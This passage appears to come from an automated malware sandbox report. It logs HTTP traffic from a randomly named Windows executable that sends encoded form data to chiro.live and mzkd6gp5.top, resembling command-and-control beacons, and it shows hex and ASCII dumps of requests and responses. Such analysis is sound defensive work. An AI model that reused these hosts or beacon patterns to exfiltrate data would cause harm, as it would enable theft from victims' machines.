Data Ascii: le-touch-icon" media="screen and (resolution: 326dpi)" href="https://static.loopia.se/responsive/images/iOS-114.png" /> <meta name="viewport" content="initial-scale=1.0, maximum-scale = 1.0, width=device-width" /> <link rel="stylesheet
Jan 9, 2025 16:53:52.051546097 CET | 1289 | IN | Data Raw: 20 74 6f 20 76 69 65 77 20 74 68 65 20 64 6f 6d 61 69 6e 20 68 6f 6c 64 65 72 27 73 20 70 75 62 6c 69 63 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 09 09 09 3c 70 3e 41 72 65 20 79 6f 75 20 74 68 65 20 6f 77 6e 65 72 20 6f 66 20 74 68
Data Ascii: to view the domain holder's public information.</p><p>Are you the owner of the domain and want to get started? Login to <a href="https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&utm_con
Jan 9, 2025 16:53:52.051717043 CET | 1289 | IN | Data Raw: 6c 20 63 6f 6e 74 72 6f 6c 20 6f 66 20 79 6f 75 72 20 64 6f 6d 61 69 6e 73 20 77 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 3c 2f 68 33 3e 0a 09 09 09 3c 70 3e 57 69 74 68 20 4c 6f 6f 70 69 61 44 4e 53 2c 20 79 6f 75 20 77 69 6c 6c 20 62 65 20 61 62
Data Ascii: l control of your domains with LoopiaDNS</h3><p>With LoopiaDNS, you will be able to manage your domains in one single place in Loopia Customer zone. <a href="https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingwe
Jan 9, 2025 16:53:52.051755905 CET | 661 | IN | Data Raw: 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 70 61 72 6b 69 6e 67 77 65 62 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 68 6f 73 74 69 6e 67 22 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 70 72 69 6d 61 72 79 22 3e 4f 75 72
Data Ascii: arkingweb&utm_campaign=parkingweb&utm_content=hosting" class="btn btn-primary">Our web hosting packages</a></div>... /END .main --><div id="footer" class="center"><span id="footer_se" class='lang_se'><a href="https://www.loop
Jan 9, 2025 16:53:52.051786900 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.30 | 49823 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
Timestamp | Bytes transferred | Direction | Data
Jan 9, 2025 16:54:07.569076061 CET | 793 | OUT | POST /jwa9/ HTTP/1.1
Host: www.chiro.live
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en
Connection: close
Cache-Control: no-cache
Content-Length: 203
Content-Type: application/x-www-form-urlencoded
Origin: http://www.chiro.live
Referer: http://www.chiro.live/jwa9/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 62 31 62 57 4b 43 2f 49 59 6a 66 30 74 63 71 2f 61 71 46 51 5a 65 72 4a 55 45 2b 4d 72 70 30 61 7a 51 6d 75 45 61 6f 4c 2b 76 66 52 72 7a 69 56 36 5a 79 71 4b 70 58 61 2f 35 59 43 4f 6a 57 69 45 49 41 58 48 65 74 2b 58 4b 39 6d 49 63 6d 79 42 62 54 50 4f 52 34 78 58 52 2f 4f 66 30 38 4e 39 65 72 65 45 43 46 4a 79 61 6f 4d 51 48 78 52 6d 42 31 34 35 49 4d 6f 6e 4e 74 73 2b 6a 56 54 79 69 4f 61 43 63 45 4b 68 49 36 77 7a 64 34 78 57 49 34 33 32 56 4b 6e 4d 4d 30 6c 58 56 53 4a 6f 49 77 5a 33 4b 4c 4f 54 37 34 72 6e 7a 7a 6b 43 57 72 52 43 67 3d 3d
Data Ascii: 6B-l7F=qZs751u9hJjEb1bWKC/IYjf0tcq/aqFQZerJUE+Mrp0azQmuEaoL+vfRrziV6ZyqKpXa/5YCOjWiEIAXHet+XK9mIcmyBbTPOR4xXR/Of08N9ereECFJyaoMQHxRmB145IMonNts+jVTyiOaCcEKhI6wzd4xWI432VKnMM0lXVSJoIwZ3KLOT74rnzzkCWrRCg==
                                                                                    Jan 9, 2025 16:54:07.714026928 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:07 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 06 83 9d 60 37 90 4e 42 e3 af 3a 76 e2 38 c1 f8 92 11 92 62 89 08 89 82 00 3b 9d fe f7 62 e8 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 fd e1 db dc 5d fa 77 37 0a 91 11 bb 3c b1 f7 9b c2 00 df 38 2a e6 ea e5 89 52 2e 9b 60 80 ea 63 65 46 58 02 05 12 90 a4 58 3a ea e3 72 d0 ea fd 89 3c fc 26 52 c6 2d fc 23 a3 b9 a3 6e 5b 19 68 41 11 c5 40 d2 80 61 55 81 82 4b cc cb dc f1 8d 83 d1 06 1f 65 73 10 61 47 cd 29 2e 62 91 c8 46 42 41 91 24 0e c2 39 85 b8 55 19 9f 15 ca a9 a4 80 b5 52 08 18 76 0c ad dd 84 93 54 32 7c 69 eb f5 5e d1 a9 9a e4 22 85 09 8d e5 81 d6 bf 7b 4f f0 4b 82 53 d2 68 a1 7d 91 25 cc d9 f3 fb a2 eb 45 51 58 6d 0d 12 9a 08 8d d1 1c eb aa a2 1f 20 6d fd b8 8c 5d a9 d7 94 e7 b8 c4 d9 ff 95 b0 f5 c3 60 ec 40 a0 9d 22 38 13 00 39 2a 12 cf f5 f1 e3 a7 a6 18 35 65 45 ee e2 52 5d 89 b7 52 0f 41 0e 6a 6f 23 6e af c4 4b c6 a1 a4 82 2b 0d 28 e5 e7 bb 7e fb 90 fd 2a 28 47 a2 d0 a4 88 35 26 60 39 5f c1 35 52 12 52 1c [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPv`7NB:v8b;btCu@e]w7<8*R.`ceFXX:r<&R-#n[hA@aUKesaG).bFBA$9URvT2|i^"{OKSh}%EQXm m]`@"89*5eER]RAjo#nK+(~*(G5&`9_5RRE=H(,@&v0-?YFcXnZZ,oZB<d:x71`JN/_jn|>vh0H@E1uPgXMiQWxpnC2pS<n+Ru]CEtICljL%Ac'mx~8<SWC[^eoCp8zVvzt~[)K0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    2 | 192.168.11.30 | 49824 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:10.245862961 CET | 813 | OUT | POST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 6b 61 79 78 57 75 46 65 38 4c 35 76 66 52 6a 54 69 51 6e 4a 79 74 4b 70 4c 38 2f 34 30 43 4f 6e 32 69 45 4e 73 58 62 39 56 39 46 71 39 67 42 38 6d 30 46 62 54 50 4f 52 34 78 58 52 72 6f 66 30 6b 4e 38 75 62 65 47 6a 46 4b 2b 36 6f 54 48 33 78 52 77 78 31 38 35 49 4d 4b 6e 50 4a 4b 2b 67 74 54 79 6a 2b 61 43 4e 45 4a 36 59 36 79 75 4e 35 65 64 59 68 68 34 46 6d 77 4c 65 55 65 50 32 72 39 6b 2f 64 44 71 4a 2f 4d 41 62 45 47 37 79 65 4d 41 55 71 4b 66 72 59 30 44 71 6c 53 7a 71 2f 32 32 6c 6b 67 7a 42 7a 78 53 6b 49 3d
                                                                                    Data Ascii: 6B-l7F=qZs751u9hJjEZXPWMljIQjf3ocq/D6FcZeXJUAOmsfkayxWuFe8L5vfRjTiQnJytKpL8/40COn2iENsXb9V9Fq9gB8m0FbTPOR4xXRrof0kN8ubeGjFK+6oTH3xRwx185IMKnPJK+gtTyj+aCNEJ6Y6yuN5edYhh4FmwLeUeP2r9k/dDqJ/MAbEG7yeMAUqKfrY0DqlSzq/22lkgzBzxSkI=
                                                                                    Jan 9, 2025 16:54:10.390666962 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:10 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 4d 73 9b 30 10 bd e7 57 50 0e 99 76 a6 e6 cb 26 b1 1b 48 27 a1 f1 57 1d 3b 71 9c 60 fb 92 11 92 62 89 08 89 82 00 3b 9d fe f7 62 e8 c4 74 dc 43 75 40 da 65 f7 ed be b7 92 f3 e1 db cc 5b ac ee 6e 14 22 23 76 79 e2 ec 37 85 01 be 71 55 cc d5 cb 13 a5 5c 0e c1 00 d5 c7 ca 8c b0 04 0a 24 20 49 b1 74 d5 c7 45 bf d5 fd 13 79 f8 4d a4 8c 5b f8 47 46 73 57 dd b6 32 d0 82 22 8a 81 a4 01 c3 aa 02 05 97 98 97 b9 a3 1b 17 a3 0d 3e ca e6 20 c2 ae 9a 53 5c c4 22 91 8d 84 82 22 49 5c 84 73 0a 71 ab 32 3e 2b 94 53 49 01 6b a5 10 30 ec 9a 9a d1 84 93 54 32 7c e9 e8 f5 5e d1 a9 9a e4 22 85 09 8d e5 81 d6 bf 7b 4f f0 4b 82 53 d2 68 c1 b8 c8 12 e6 ee f9 7d d1 f5 a2 28 ce 0d 0d 12 9a 08 8d d1 1c eb aa a2 1f 20 1d fd b8 8c 53 a9 d7 94 e7 b8 84 fd 7f 25 1c fd 30 18 27 10 68 a7 08 ce 04 40 ae 8a c4 73 7d fc f8 a9 29 46 4d 59 91 bb b8 54 57 e2 ad d4 43 90 83 da db 88 db 2b f1 92 71 28 a9 e0 4a 03 4a f9 f9 ae df 3e 64 bf 0a ca 91 28 34 29 62 8d 09 58 ce 57 70 8d 94 84 14 57 [TRUNCATED]
                                                                                    Data Ascii: 266SMs0WPv&H'W;q`b;btCu@e[n"#vy7qU\$ ItEyM[GFsW2"> S\""I\sq2>+SIk0T2|^"{OKSh}( S%0'h@s})FMYTWC+q(JJ>d(4)bXWpWQ5]4LOQNkfvnTHglR&^^WW:j9p7:yS^{Xn=,$(zGdqi^^PlF|>-S,hSe't.WyXtz{2`r#6W%Ic'm}~8PnWQzIB0g%9MzVLwzt~[)K0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    3 | 192.168.11.30 | 49825 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:12.931546926 CET | 1289 | OUT | POST /jwa9/ HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 3339
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.chiro.live
                                                                                    Referer: http://www.chiro.live/jwa9/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 71 5a 73 37 35 31 75 39 68 4a 6a 45 5a 58 50 57 4d 6c 6a 49 51 6a 66 33 6f 63 71 2f 44 36 46 63 5a 65 58 4a 55 41 4f 6d 73 66 73 61 79 44 4f 75 45 35 41 4c 34 76 66 52 70 7a 69 52 6e 4a 7a 6f 4b 70 44 77 2f 34 70 31 4f 6c 4f 69 46 76 6b 58 58 63 56 39 4f 71 39 67 4d 63 6d 78 42 62 54 67 4f 52 6f 4c 58 52 37 6f 66 30 6b 4e 38 74 54 65 42 79 46 4b 38 36 6f 4d 51 48 78 56 6d 42 30 6a 35 49 56 6f 6e 50 64 38 2b 6a 64 54 79 51 47 61 42 2f 73 4a 36 59 36 79 6a 74 35 62 64 59 64 6b 34 46 75 6b 4c 63 30 6f 50 6c 48 39 31 36 34 4d 75 59 7a 6e 66 64 45 6d 7a 54 75 30 49 32 75 75 58 4d 4d 58 4d 5a 70 51 36 4f 71 63 2b 53 41 4f 6b 67 2f 30 41 6a 63 46 49 69 44 6d 61 39 4f 4c 4e 65 76 6b 39 41 56 42 46 74 53 33 35 72 49 4d 4d 77 79 4d 53 31 52 58 77 48 79 46 5a 70 34 62 4b 49 4f 4e 4c 4b 6b 73 61 79 52 66 59 4b 6d 56 35 36 77 58 55 6e 62 51 4a 46 62 5a 68 71 44 34 78 44 4b 61 6b 56 73 52 67 2b 73 78 56 6b 52 47 5a 65 35 73 4e 4b 50 78 65 53 64 7a 4a 61 5a 70 7a 74 4a 6d 54 56 62 54 63 6b 4f [TRUNCATED]
                                                                                    Data Ascii: 6B-l7F=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
                                                                                    Jan 9, 2025 16:54:12.931598902 CET | 2578 | OUT | Data Raw: 41 4c 37 42 63 52 37 6d 46 58 42 59 4f 49 31 53 59 57 73 4b 65 49 75 35 73 7a 70 50 78 49 68 5a 2f 73 48 64 77 2b 44 6d 53 61 2f 5a 54 4a 39 73 46 71 58 50 49 45 4c 78 71 49 32 6e 55 66 61 64 38 4d 74 32 73 77 75 42 78 6d 38 4e 31 32 52 37 37 68
                                                                                    Data Ascii: AL7BcR7mFXBYOI1SYWsKeIu5szpPxIhZ/sHdw+DmSa/ZTJ9sFqXPIELxqI2nUfad8Mt2swuBxm8N12R77hvXRdgN78AVrqqFN08gzz6YM3Qg63TdurPPd3+O4NKtYphxRDSaBcvefuzZsOijEz1Qsd//JqsTFj98fVa53rRUPHL1EEg7q7DTL31UZENO30mKP0gqq26jGHCTdNJqu8KKKsuA9Xmi717ceTxVCJcD0VVzaATABz+
                                                                                    Jan 9, 2025 16:54:12.931653976 CET | 63 | OUT | Data Raw: 6b 57 46 35 44 62 70 5a 6c 37 63 6b 30 65 55 66 34 33 30 37 6c 38 76 4c 50 39 49 6b 58 6c 56 72 6e 53 67 66 46 32 31 55 4e 43 6c 36 79 49 74 4a 66 75 73 2f 2f 76 35 78 68 6c 74 4c 77 3d 3d
                                                                                    Data Ascii: kWF5DbpZl7ck0eUf4307l8vLP9IkXlVrnSgfF21UNCl6yItJfus//v5xhltLw==
                                                                                    Jan 9, 2025 16:54:13.076890945 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:13 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    content-encoding: gzip
                                                                                    connection: close
                                                                                    Data Raw: 32 36 36 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d cf 57 50 1e 32 ed 4c 6d 30 d8 89 dd 40 3a 09 8d 6f 75 ec c4 71 02 f6 4b 46 48 8a 25 22 24 0a 02 ec 74 fa ef e5 d2 89 e9 b8 0f d5 8c 2e bb da 3d bb 7b 56 b2 3e 7c 5b 38 ab f5 dd 8d 42 64 c8 2e 4f ac 72 53 18 e0 5b 5b c5 5c bd 3c 51 8a 61 11 0c 50 7d ac c4 10 4b a0 40 02 e2 04 4b 5b 7d 5c 0d 5b fd 3f 96 87 6b 22 65 d4 c2 3f 52 9a d9 ea ae 95 82 16 14 61 04 24 f5 19 56 15 28 b8 c4 bc f0 9d dc d8 18 6d f1 91 37 07 21 b6 d5 8c e2 3c 12 b1 6c 38 e4 14 49 62 23 9c 51 88 5b 95 f0 59 a1 9c 4a 0a 58 2b 81 80 61 bb d3 d6 9b 70 92 4a 86 2f 2d ad de ab 72 aa 24 b9 48 60 4c 23 79 28 eb df b9 c7 f8 25 c6 09 69 a4 a0 5f a4 31 b3 cb fa be 68 5a 9e e7 e7 7a 1b 12 1a 8b 36 a3 19 d6 54 45 3b 40 5a da 71 18 ab 62 af 49 cf 71 88 de ff 85 b0 b4 43 63 2c 5f a0 bd 22 38 13 00 d9 2a 12 cf f5 f1 e3 a7 26 19 75 c9 8a dc 47 05 bb 12 ef a4 16 80 0c d4 da 86 5d c9 c4 4b ca a1 a4 82 2b 0d 28 e5 e7 3b 7f a5 49 39 72 ca 91 c8 db 52 44 6d 26 60 d1 5f c1 db a4 28 48 [TRUNCATED]
                                                                                    Data Ascii: 266Sr0}WP2Lm0@:ouqKFH%"$t.={V>|[8Bd.OrS[[\<QaP}K@K[}\[?k"e?Ra$V(m7!<l8Ib#Q[YJX+apJ/-r$H`L#y(%i_1hZz6TE;@ZqbIqCc,_"8*&uG]K+(;I9rRDm&`_(H@Q I)Ev<}gu7zO$8~6~+]+:3"sz3)T27e@esi6w3Y<kwlk}/g`#p|wNe>tkn`-#fxIf#&.b3chw]`txD|w7G=>sD=U8\n{HF9GA>t^_5/Z0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    4 | 192.168.11.30 | 49826 | 45.33.2.79 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:15.611571074 CET | 533 | OUT | GET /jwa9/?6B-l7F=nbEb6BapjrCYd3vuEk68dRLY4ua2Mo84Z9DLelTcrJ4p8hOiBplI39ztzhaal76qFYKe8ooJF22mI/JvRPR9KZtEPsGPSZvpHz4gKTT9RHcltuCAAAk51J4=&80k=lRapCPMXgDk HTTP/1.1
                                                                                    Host: www.chiro.live
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Jan 9, 2025 16:54:15.756664038 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                    server: openresty/1.13.6.1
                                                                                    date: Thu, 09 Jan 2025 15:54:15 GMT
                                                                                    content-type: text/html
                                                                                    transfer-encoding: chunked
                                                                                    connection: close
                                                                                    Data Raw: 34 39 44 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 63 68 69 72 6f 2e 6c [TRUNCATED]
                                                                                    Data Ascii: 49D<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.chiro.live/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.chiro.live/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.chiro.live/jwa9?gp=1&js=1&uuid=1736438055.0042517179&other_args=eyJ1cmkiOiAiL2p3YTkiLCAiYXJncyI6ICI2Qi1sN0Y9bmJFYjZCYXBqckNZZDN2dUVrNjhkUkxZNHVhMk1vODRaOURMZWxUY3JKNHA4aE9pQnBsSTM5enR6aGFhbDc2cUZZS2U4b29KRjIybUkvSnZSUFI5S1p0RVBzR1BTWnZwSHo0Z0tUVDlSSGNsdHVDQUFBazUxSjQ9Jjgwaz1sUmFwQ1BNWGdEayIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7 [TRUNCATED]
                                                                                    Jan 9, 2025 16:54:15.756706953 CET | 60 | IN | Data Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: ; } </script> </body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.11.30 | 49827 | 104.21.32.1 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:21.038851976 CET | 799 | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 203
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                                    Data Raw: 36 42 2d 6c 37 46 3d 68 30 77 54 7a 30 51 4d 2b 73 7a 64 34 58 4a 33 6e 47 45 56 43 58 2f 32 6c 38 56 62 72 69 46 4a 36 52 38 58 54 6f 57 30 43 6f 45 57 75 58 67 37 37 4f 6b 70 7a 57 6e 7a 63 50 37 48 4c 35 47 50 76 48 6c 71 6d 66 6b 6e 67 67 32 6f 42 6a 73 30 65 31 4d 59 75 53 6e 67 70 6a 36 61 67 48 64 4e 56 35 65 76 37 62 7a 70 45 76 50 53 62 38 44 31 73 7a 6c 45 4c 68 72 2f 2b 66 2b 58 55 77 6a 4c 38 71 79 50 6a 30 45 34 2b 65 38 6b 39 46 69 31 48 4c 45 6f 47 78 36 35 7a 57 77 6d 61 33 6f 4f 46 37 73 77 76 31 51 31 34 52 75 66 6f 59 2b 49 76 6a 57 45 41 63 36 54 75 4a 64 4d 34 50 46 54 48 77 3d 3d
                                                                                    Data Ascii: 6B-l7F=h0wTz0QM+szd4XJ3nGEVCX/2l8VbriFJ6R8XToW0CoEWuXg77OkpzWnzcP7HL5GPvHlqmfkngg2oBjs0e1MYuSngpj6agHdNV5ev7bzpEvPSb8D1szlELhr/+f+XUwjL8qyPj0E4+e8k9Fi1HLEoGx65zWwma3oOF7swv1Q14RufoY+IvjWEAc6TuJdM4PFTHw==
                                                                                    Jan 9, 2025 16:54:21.608357906 CET | 917 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Thu, 09 Jan 2025 15:54:21 GMT
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    cf-cache-status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8NE7Oz%2BRLdH3W%2BbqQhjSXugvdGh%2FH38aCfWPFbFr0aCu5gajtSSSYCL1v%2F43SboHEgw2tsWzPFfIpOBpTGqlEtkFtDypRYCnVq8NrckcD4Ai8626gRqLRXzJUm%2BR5mhw%2Bc9H"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8ff59af9e876e269-ORD
                                                                                    Content-Encoding: gzip
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=124098&min_rtt=124098&rtt_var=62049&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=799&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a
                                                                                    Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a3
                                                                                    Jan 9, 2025 16:54:21.608403921 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.11.30 | 49828 | 104.21.32.1 | 80 | 5384 | C:\Program Files (x86)\RvcRoKuxtBljxBeMzTFOHyhbWWJNAXUyqIDMHIhTvh\SwDwSdNMaTt.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 9, 2025 16:54:23.700556040 CET | 819 | OUT | POST /3u0p/ HTTP/1.1
                                                                                    Host: www.mzkd6gp5.top
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Accept-Language: en-US,en
                                                                                    Connection: close
                                                                                    Cache-Control: no-cache
                                                                                    Content-Length: 223
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Origin: http://www.mzkd6gp5.top
                                                                                    Referer: http://www.mzkd6gp5.top/3u0p/
                                                                                    User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; VirtualBox Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
